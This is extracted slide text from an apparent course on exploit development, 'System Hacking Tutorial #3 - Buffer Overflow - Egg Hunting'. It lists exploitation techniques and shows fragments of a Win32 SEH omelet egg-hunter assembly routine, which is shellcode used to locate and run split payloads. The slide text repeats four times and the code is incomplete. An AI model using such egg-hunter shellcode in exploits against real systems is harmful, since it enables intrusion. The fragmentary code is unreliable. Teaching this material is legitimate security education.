![Page 79: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/79.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
custom_w32_SEH_omelet.asm
marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack
copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg
done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
![Page 80: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/80.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
custom_w32_SEH_omelet.asm
marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack
copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg
done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
![Page 81: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/81.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
custom_w32_SEH_omelet.asm
marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack
copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg
done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
![Page 82: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/82.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
custom_w32_SEH_omelet.asm
marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack
copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg
done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
![Page 83: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/83.jpg)
Thank You :)
See you the week after next week